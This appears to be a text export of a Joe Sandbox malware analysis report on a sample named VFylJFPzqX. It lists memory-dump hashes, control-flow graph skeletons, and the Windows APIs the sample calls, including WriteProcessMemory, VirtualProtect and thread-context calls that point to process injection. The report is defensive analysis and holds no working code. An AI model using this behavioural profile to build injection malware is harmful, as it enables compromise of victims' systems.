                                                                                                                                                                                                                                        • Opcode ID: d8df92a096e23f9637f9d546d2746ede8ee235a07117c0910e15f6f911dcb16d
                                                                                                                                                                                                                                        • Instruction ID: fc5cf2af3564997cfe5d6b0e27d80dba327a0a55fb39112da389e4cadc6b28e0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8df92a096e23f9637f9d546d2746ede8ee235a07117c0910e15f6f911dcb16d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA5188B0E11209DFDB09DFA5E4445AEFBB2FF89301F10C869D41AA7258DB399A02CF51
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 87f9045ea652eb15eb03fe5fa616eb95caff72f9105687406cd26d15dbe1cbdc
                                                                                                                                                                                                                                        • Instruction ID: d85df65b0adbc65bc9d379173d2b89a6f7785bbef6ba4fcb4df21eae2577ae61
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87f9045ea652eb15eb03fe5fa616eb95caff72f9105687406cd26d15dbe1cbdc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 765147B4D0424ADFEB04CFAAD5806AEFFB6EF89300F149429D119B7214D7399A428F91
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 4a73867bb5ca8039a2a3dbfda647e75955c8b0de01e38632f35b5f230dce0be0
                                                                                                                                                                                                                                        • Instruction ID: e9d4be470c4f3f1cd68fbd87f17017aa02e192bd1cdef925d7b9ed05304fe1b1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a73867bb5ca8039a2a3dbfda647e75955c8b0de01e38632f35b5f230dce0be0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D5117B4E15618DBCB08DFA5E9845DDFBB2FF89301F24A02AD446B7254EB389D01CB25
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 3134112495f3d9dd29ed99270ce8b554e1c9e3327d478b3c406246786fe3189a
                                                                                                                                                                                                                                        • Instruction ID: b25a88c4279d4aafa4736766065927bd33eadde9606a178672b42119d9ee8477
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3134112495f3d9dd29ed99270ce8b554e1c9e3327d478b3c406246786fe3189a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64519AB4D11209DFEB08CFA5E8446AEBBB2FF89301F04946ED81AA7754DB385A01CF50
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: abc6f07f32d98f94179e6c595ebdaad8026bc438b1f58121fafc95f5c21db4df
                                                                                                                                                                                                                                        • Instruction ID: 80860757a11a4042bf6c17f2b89cadf5c3c40dc4f1e75ded48bbf1f0939000a9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: abc6f07f32d98f94179e6c595ebdaad8026bc438b1f58121fafc95f5c21db4df
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 314125B4E15618DBCB08DFA6E9445DDFBB2FF89301F14A02AD406B7254EB389D018B25
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: eabbdb412b5a1247e6ddf9b1166ca84cb1d3019f9df3ec65cb2508cc3f8d28a0
                                                                                                                                                                                                                                        • Instruction ID: 2b43228cbdb1fb9d66e011711b0c0ebac371be43c3b6db43db8a479dc2659ebc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eabbdb412b5a1247e6ddf9b1166ca84cb1d3019f9df3ec65cb2508cc3f8d28a0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B51D475E002588FDB18DFAAC841B9DBBB2FF89300F20C16AD819AB355DB315946DF50
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e01b4279b7b6a46a0ce74b0d2a37f20df7595a1342e3d8e46e48dff7eaf1723e
                                                                                                                                                                                                                                        • Instruction ID: e8e6da5339fddafa31aa86d36a0f7707c7c7d380a81c060c1f30a6ba421654b3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e01b4279b7b6a46a0ce74b0d2a37f20df7595a1342e3d8e46e48dff7eaf1723e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1519871E146588FDB58CF6B8D4579AFBF3AFC9200F14C1BAD44CAA225DB301A858F51
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 370be563b0b6a2a43a407637a427f8886acbabee2b1c095e05265895808d016b
                                                                                                                                                                                                                                        • Instruction ID: c3f0ea4eda15823b58ec2622870a2b8ce158b899cd7fdfcd886d16265bde8a14
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 370be563b0b6a2a43a407637a427f8886acbabee2b1c095e05265895808d016b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37514871E10619CBDB68CF6BCD4579AFAF3AFC8200F14C1BA954DA6264DB301A858F51

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0562D1D6
                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0562D213
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0562D250
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0562D2A9
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                                                                                                        • Opcode ID: 087a057394c8df2293f4f6949b53b2931b52f9a40cd39abbba4902b3e4278000
                                                                                                                                                                                                                                        • Instruction ID: c794bfc4071a34074012d2652aa3812a0f614fbb0e3f54ec13395607a789b709
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 087a057394c8df2293f4f6949b53b2931b52f9a40cd39abbba4902b3e4278000
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 125174B190170A8FDB14DFAAD548B9EBBF1FB88314F20C419E409A7390DB389985CF65

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0562D1D6
                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0562D213
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0562D250
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0562D2A9
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                                                                                                        • Opcode ID: 2817ce711089466cd31900ffa2e4ce3157e7353d7b2c2a364322371784cc4577
                                                                                                                                                                                                                                        • Instruction ID: bf977f4ff26f71b6ba38ff46a91e50c1ce972f736d05ef2847025bba3a1b6993
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2817ce711089466cd31900ffa2e4ce3157e7353d7b2c2a364322371784cc4577
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F45153B190170A8FDB14DFAAD548B9EBBF1BB88314F20C059E409A73A0DB349985CF65

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        (legend for the graph colouring; the text export keeps only the blocks and edges listed below)
                                                                                                                                                                                                                                        Blocks (id, address range, annotation) -> successor block ids:
                                                                                                                                                                                                                                        313 5e50040-5e50057 -> 315, 316
                                                                                                                                                                                                                                        315 5e50059-5e50068 -> 316, 319
                                                                                                                                                                                                                                        316 5e500ba-5e500c8 -> 320, 321
                                                                                                                                                                                                                                        319 5e5006a-5e50076 -> 325, 326
                                                                                                                                                                                                                                        320 5e500db-5e500dd -> 422, 423, 424, 425
                                                                                                                                                                                                                                        321 5e500ca-5e500d5 -> 320, 327
                                                                                                                                                                                                                                        322 5e500e5-5e500f4 -> 331, 332
                                                                                                                                                                                                                                        325 5e50078-5e50084 -> 326, 334
                                                                                                                                                                                                                                        326 5e5008a-5e500a6 -> 338, 339
                                                                                                                                                                                                                                        327 5e5019a-5e50212 -> 353, 354
                                                                                                                                                                                                                                        331 5e500f6-5e50105 -> 332
                                                                                                                                                                                                                                        332 5e5010c-5e5010f -> (none)
                                                                                                                                                                                                                                        334 5e50110-5e5014e -> 338
                                                                                                                                                                                                                                        338 5e50155-5e50193 -> 327
                                                                                                                                                                                                                                        339 5e500ac-5e500b0 -> 316
                                                                                                                                                                                                                                        353 5e50214-5e5021a -> (none)
                                                                                                                                                                                                                                        354 5e5021b-5e50225 -> 357, 358
                                                                                                                                                                                                                                        357 5e50461-5e5048d -> 363
                                                                                                                                                                                                                                        358 5e5022b-5e50244 -> 363, 364
                                                                                                                                                                                                                                        363 5e50494-5e504d0 -> 382, 383
                                                                                                                                                                                                                                        364 5e5024a-5e5026c -> 371, 372
                                                                                                                                                                                                                                        371 5e5027d-5e5028c -> 376, 377
                                                                                                                                                                                                                                        372 5e5026e-5e5027c -> (none)
                                                                                                                                                                                                                                        376 5e502b1-5e502d2 -> 389, 390
                                                                                                                                                                                                                                        377 5e5028e-5e502ab -> 376
                                                                                                                                                                                                                                        382 5e504d2-5e504ed -> (none)
                                                                                                                                                                                                                                        383 5e5050a-5e50548 -> 387, 388
                                                                                                                                                                                                                                        387 5e5055f-5e50585 GetCurrentThreadId -> 391, 392
                                                                                                                                                                                                                                        388 5e5054a-5e5055d -> 393
                                                                                                                                                                                                                                        389 5e502d4-5e502e5 -> 398, 399
                                                                                                                                                                                                                                        390 5e50322-5e5034a -> 418, 419, 420, 421
                                                                                                                                                                                                                                        391 5e50587-5e5058d -> 392
                                                                                                                                                                                                                                        392 5e5058e -> 393
                                                                                                                                                                                                                                        393 5e50595-5e505a2 -> (none)
                                                                                                                                                                                                                                        398 5e50314-5e50318 -> 390
                                                                                                                                                                                                                                        399 5e502e7-5e502ff -> 406, 407
                                                                                                                                                                                                                                        403 5e50350-5e50375 -> 409, 410
                                                                                                                                                                                                                                        406 5e50304-5e50312 -> 398, 399
                                                                                                                                                                                                                                        407 5e50301-5e50302 -> 406
                                                                                                                                                                                                                                        409 5e50377-5e5038c -> 410, 413
                                                                                                                                                                                                                                        410 5e503bb -> 357
                                                                                                                                                                                                                                        413 5e5038e-5e503b1 -> 410, 417
                                                                                                                                                                                                                                        417 5e503b3 -> 410
                                                                                                                                                                                                                                        418 5e5034d call 5e50780 -> 403
                                                                                                                                                                                                                                        419 5e5034d call 5e50770 -> 403
                                                                                                                                                                                                                                        420 5e5034d call 5e73548 -> 403
                                                                                                                                                                                                                                        421 5e5034d call 5e73558 -> 403
                                                                                                                                                                                                                                        422 5e500df call 5e503e6 -> 322
                                                                                                                                                                                                                                        423 5e500df call 5e50006 -> 322
                                                                                                                                                                                                                                        424 5e500df call 5e50040 -> 322
                                                                                                                                                                                                                                        425 5e500df call 5e503be -> 322
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488232394.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e50000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c79d3465efbab91562234725256f038a7b2eefafaa5dbf6466a26048b3f7b013
                                                                                                                                                                                                                                        • Instruction ID: 4ba81fb4ee502684ad20f63e5d997f49b9dc736258b1d3be9fcd5b4d3f23c16c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c79d3465efbab91562234725256f038a7b2eefafaa5dbf6466a26048b3f7b013
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FFD16E31B006148FEB14EBB8C559AAE77F6FFC8714B148469E846AB390CB35EC41CB65

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        (legend for the graph colouring; the text export keeps only the blocks and edges listed below)
                                                                                                                                                                                                                                        Blocks (id, address range, annotation) -> successor block ids:
                                                                                                                                                                                                                                        426 562aed0-562aedf -> 427, 428
                                                                                                                                                                                                                                        427 562aee1-562aeee call 562a8bc -> 434, 435
                                                                                                                                                                                                                                        428 562af0b-562af0f -> 430, 431
                                                                                                                                                                                                                                        430 562af23-562af64 -> 437, 438
                                                                                                                                                                                                                                        431 562af11-562af1b -> 430
                                                                                                                                                                                                                                        434 562aef0 -> 484, 485
                                                                                                                                                                                                                                        435 562af04 -> 428
                                                                                                                                                                                                                                        437 562af71-562af7f -> 439, 440
                                                                                                                                                                                                                                        438 562af66-562af6e -> 437
                                                                                                                                                                                                                                        439 562afa3-562afa5 -> 445
                                                                                                                                                                                                                                        440 562af81-562af86 -> 442, 443
                                                                                                                                                                                                                                        441 562aefc-562aefe -> 435, 444
                                                                                                                                                                                                                                        442 562af91 -> 447
                                                                                                                                                                                                                                        443 562af88-562af8f call 562a8c8 -> 447
                                                                                                                                                                                                                                        444 562b040-562b100 -> 477, 478
                                                                                                                                                                                                                                        445 562afa8-562afaf -> 448, 449
                                                                                                                                                                                                                                        447 562af93-562afa1 -> 445
                                                                                                                                                                                                                                        448 562afb1-562afb9 -> 449
                                                                                                                                                                                                                                        449 562afbc-562afc3 -> 451, 452
                                                                                                                                                                                                                                        451 562afd0-562afd9 call 562a8d8 -> 457, 458
                                                                                                                                                                                                                                        452 562afc5-562afcd -> 451
                                                                                                                                                                                                                                        457 562afe6-562afeb -> 460, 461
                                                                                                                                                                                                                                        458 562afdb-562afe3 -> 457
                                                                                                                                                                                                                                        460 562b009-562b00d -> 482, 483
                                                                                                                                                                                                                                        461 562afed-562aff4 -> 460, 462
                                                                                                                                                                                                                                        462 562aff6-562b006 call 562a8e8 call 562a8f8 -> 460
                                                                                                                                                                                                                                        465 562b013-562b016 -> 467, 468
                                                                                                                                                                                                                                        467 562b018-562b036 -> 468
                                                                                                                                                                                                                                        468 562b039-562b03f -> (none)
                                                                                                                                                                                                                                        477 562b102-562b105 -> 478
                                                                                                                                                                                                                                        478 562b108-562b133 GetModuleHandleW -> 479, 480
                                                                                                                                                                                                                                        479 562b135-562b13b -> 480
                                                                                                                                                                                                                                        480 562b13c-562b150 -> (none)
                                                                                                                                                                                                                                        482 562b010 call 562b468 -> 465
                                                                                                                                                                                                                                        483 562b010 call 562b458 -> 465
                                                                                                                                                                                                                                        484 562aef6 call 562b168 -> 441
                                                                                                                                                                                                                                        485 562aef6 call 562b158 -> 441
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0562B126
Memory Dump Source
• Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: ca4dc5006d0b5faa8e9ba6810629d9ca0ea04417904ec53ac7c9d1eef66cff12
• Instruction ID: 871df991c614507242eb0cf0c2e7bc991c5c43cc58a1e95f4f3188ed9c733bed
• Opcode Fuzzy Hash: ca4dc5006d0b5faa8e9ba6810629d9ca0ea04417904ec53ac7c9d1eef66cff12
• Instruction Fuzzy Hash: E47115B0A04B158FD724DF6AD44575ABBF2FF88200F008A2DE44A97B50D7B9E845CF91

Control-flow Graph
control_flow_graph 508 5a21ced-5a21d5e 509 5a21d60-5a21d66 508->509 510 5a21d69-5a21d70 508->510 509->510 511 5a21d72-5a21d78 510->511 512 5a21d7b-5a21db3 510->512 511->512 513 5a21dbb-5a21e1a CreateWindowExW 512->513 514 5a21e23-5a21e5b 513->514 515 5a21e1c-5a21e22 513->515 519 5a21e68 514->519 520 5a21e5d-5a21e60 514->520 515->514 521 5a21e69 519->521 520->519 521->521
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A21E0A
Memory Dump Source
• Source File: 00000000.00000002.1487871798.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5a20000_VFylJFPzqX.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 54e0ef0ba250c506b6bcd4eb9205f8bfee4a5fa53922c5abdc53cd68a760c784
• Instruction ID: a9405c2ba3d6c253bd07c54c24b2fee89c910b343e38b777f987f03eca83ac84
• Opcode Fuzzy Hash: 54e0ef0ba250c506b6bcd4eb9205f8bfee4a5fa53922c5abdc53cd68a760c784
• Instruction Fuzzy Hash: 9251C0B1D00319EFDF14CFA9D885ADEBBB5BF48310F64812AE819AB210D7759945CF90

Control-flow Graph
control_flow_graph 522 5a21cf8-5a21d5e 523 5a21d60-5a21d66 522->523 524 5a21d69-5a21d70 522->524 523->524 525 5a21d72-5a21d78 524->525 526 5a21d7b-5a21e1a CreateWindowExW 524->526 525->526 528 5a21e23-5a21e5b 526->528 529 5a21e1c-5a21e22 526->529 533 5a21e68 528->533 534 5a21e5d-5a21e60 528->534 529->528 535 5a21e69 533->535 534->533 535->535
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A21E0A
Memory Dump Source
• Source File: 00000000.00000002.1487871798.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5a20000_VFylJFPzqX.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 916599740f8221dca65dc8c146baa2f2d2e94e99b3021a57bbc46e341b25ddf2
• Instruction ID: f21f30f2dfdd9bdc09860de1ca6739b4ca558bae66b340341c6632d43f3fdc07
• Opcode Fuzzy Hash: 916599740f8221dca65dc8c146baa2f2d2e94e99b3021a57bbc46e341b25ddf2
• Instruction Fuzzy Hash: EB41B0B1D00319EFDB14CF9AD885ADEBBB5BF88310F64812AE819AB210D7759945CF90
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 0A213453
Memory Dump Source
• Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 5e0cd07e98237a4bea0ec39a96b86c9294d08a8e3c9e1427208e88c95b441a49
• Instruction ID: 769829f9e87d63bb7b766f450d1153202f9298e53c20461c7b567e509bfceb77
• Opcode Fuzzy Hash: 5e0cd07e98237a4bea0ec39a96b86c9294d08a8e3c9e1427208e88c95b441a49
• Instruction Fuzzy Hash: BE316975D00349DFDB10DFAAD880BEEBBF5EB49310F10806AE858A7251D3799A44CFA1

Control-flow Graph
control_flow_graph 536 5a2154c-5a242fc 539 5a24302-5a24307 536->539 540 5a243ac-5a243cc call 5a21424 536->540 541 5a2435a-5a24392 CallWindowProcW 539->541 542 5a24309-5a24340 539->542 548 5a243cf-5a243dc 540->548 544 5a24394-5a2439a 541->544 545 5a2439b-5a243aa 541->545 549 5a24342-5a24348 542->549 550 5a24349-5a24358 542->550 544->545 545->548 549->550 550->548
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 05A24381
Memory Dump Source
• Source File: 00000000.00000002.1487871798.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5a20000_VFylJFPzqX.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: 7afe7274ad81fd36e3671da2b12f25094ebf00d161fc9cd0f9877f4f04af65d1
• Instruction ID: e57c3c2df4f4fca6dacfce14970b82976ae80e24f9e8aa58a32c7dd841777165
• Opcode Fuzzy Hash: 7afe7274ad81fd36e3671da2b12f25094ebf00d161fc9cd0f9877f4f04af65d1
• Instruction Fuzzy Hash: 9A4136B4A003198FCB14CF99C489FAAFBF5FB88314F248459E419A7321D774A845CFA0
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A21C8E8
Memory Dump Source
• Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 9df6de8b56dc6c89220445c9d05eb9a79ff87f3acaa22022820d1615bf5f355b
• Instruction ID: 9da2da1b734e402e64ad5f4a4a4b9f1a5d351fa14fb0839b23def1e392fd1a04
• Opcode Fuzzy Hash: 9df6de8b56dc6c89220445c9d05eb9a79ff87f3acaa22022820d1615bf5f355b
• Instruction Fuzzy Hash: 2321257591034A9FDB14DFAAC881BDEBBF5FF88310F10842AE959A7240C7789944DFA4
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0562D427
Memory Dump Source
• Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: c82c9fb60b0afc59d986db2a55d4aefd417c064604df117ced2d5e1454de698d
• Instruction ID: dd7138e3b2623d2601166532aa0737fa4e69dbed415423506edb4536d18f0d1c
• Opcode Fuzzy Hash: c82c9fb60b0afc59d986db2a55d4aefd417c064604df117ced2d5e1454de698d
• Instruction Fuzzy Hash: 3621E5B5900209AFDB10CFAAD884ADEFBF9FB48710F14841AE954A7750C374A955CFA0
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A21CE86
Memory Dump Source
• Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 498c37b765b0b86ab5af1c7b0da59816cd64bc6cc7b85064ab2c040f72cccb14
• Instruction ID: ecf1177379ab5444f56d1cd3c7a5505ed63977fc35919fc1953f50ad13944a4e
• Opcode Fuzzy Hash: 498c37b765b0b86ab5af1c7b0da59816cd64bc6cc7b85064ab2c040f72cccb14
• Instruction Fuzzy Hash: B0213875D103098FDB14DFAAC485BAEBBF4AF88610F148429D459A7240CB78A945CFA4
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0A21BF9E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                                                                        • Opcode ID: c34efc88e04d74dcde87071820775af8210d42f757e6000c46eab779e3fe7169
                                                                                                                                                                                                                                        • Instruction ID: 0746a924e79b504a960e064f9ad08eb07be5941fabc4ac540e47ead0edb12683
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c34efc88e04d74dcde87071820775af8210d42f757e6000c46eab779e3fe7169
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 862127719103098FDB14DFAAC4857EEBBF4EF88324F54842EE559A7240CB78A945CFA4
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0562D427
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                                                                                        • Opcode ID: 520df21835f709960694c45d3b740b85f6be53fde49d6db402135c6f2905a121
                                                                                                                                                                                                                                        • Instruction ID: 52ce628a426127ff4988a1aab48bdce7dba463e73e66d1d37b291665fcf30d92
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 520df21835f709960694c45d3b740b85f6be53fde49d6db402135c6f2905a121
